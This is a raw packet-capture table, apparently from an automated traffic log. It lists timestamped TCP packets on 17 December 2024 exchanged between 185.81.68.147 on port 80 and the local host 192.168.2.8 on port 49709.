                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.561414957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.561546087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.561985970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.561997890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.562433958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.562845945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.562858105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.563267946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.563735962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.563901901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.564038992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.564654112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.564809084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.564845085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.565670967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.565869093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.565956116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.566735983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.566746950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.566865921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.567590952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.567601919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.567665100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.568414927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.568527937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.568624020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.569447041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.569499016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.569685936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.570346117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.570496082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.570544004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.571325064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.613622904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.713833094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.713855982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.713870049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.713907003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.714009047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.714039087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.714651108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.714665890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.714976072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.715540886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.715584040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.715640068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.716523886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.716537952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.716571093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.717417002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.717570066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.717660904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.718431950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.718445063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.719082117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.719362020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.719429016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.719482899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.720276117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.720304966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.720432997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.721205950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.721296072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.721340895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.722183943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.722335100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.722479105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.723304987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.723352909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.723445892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.724060059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.724190950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.724304914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.725136042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.725181103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.725342989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.725985050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.726070881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.726203918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.727054119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.727070093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.727206945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.727894068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.728065014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.728106022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.728885889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.728949070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.729053020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.730000973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.730015039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.730179071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731329918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731343985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731533051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731671095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731801033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731898069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.732604980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.732822895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.732938051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.733613968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.733665943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.733784914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.734550953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.734719992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.734813929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.735526085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.735632896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.735757113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.736474037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.736485958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.736717939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.737462044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.737536907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.737606049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.738406897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.738981962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.739075899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.739272118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.739644051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.739830017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.740256071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.740364075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.740741014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.741224051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.741312027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.741436005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.742166042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.742363930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.742532015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.743170977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.743207932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.743577957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.744098902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.744247913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.744360924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.745085001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.745361090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.745469093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.745982885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.746068001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.746140957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.746982098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.747224092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.747334003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.747888088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.747978926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.748236895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.749006033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.749021053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.749167919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.749787092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.749867916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.749958038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.750731945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.750833988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.750905037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.751760960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.751835108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.751971006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.752841949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.752855062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.752974987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.753910065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.753926039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.754051924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.754503012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.754957914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.755065918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.755559921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.755629063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.755698919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.756468058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.756536007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.756603003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.757530928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.757620096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.757740021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.758428097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.758444071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.758562088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.759366989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.759413958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.759465933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.760282040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.760514021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.760555029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.761183977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.761377096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.761537075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.762403011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.762415886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.762482882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.763099909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.816608906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.905843019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.906084061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.906203985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.906239986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.906335115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.906440973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.907203913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.907347918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.907640934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.908416033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.908428907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.908580065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.909130096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.909497976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.909703016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.910079956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.910173893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.910289049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.911089897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.911370039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.911503077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.912122965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.912144899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.912286043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.913007021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.913331032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.913749933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.913851976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.913981915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.914222002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.914807081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.915096045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.915189981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.915894985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.915908098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.916013002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.916707039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.916906118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.917073965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.917983055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.917995930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.918135881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.918963909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.918977022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.919094086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.919668913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.919816971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.919863939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.920687914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.920847893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.920907021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.921505928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.921600103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.921703100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.922477007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.922622919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.922704935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.923542023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.923624039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.923722982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.924359083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.924459934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.924664974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.925424099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.925659895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.925756931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.926394939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.926405907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.926493883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.927212000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.927366972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.927459002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.928397894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.928564072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.928704977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.929128885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.929179907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.929250002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.930135965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.930244923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.930341959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.931037903 CET8049709185.81.68.147192.168.2.8
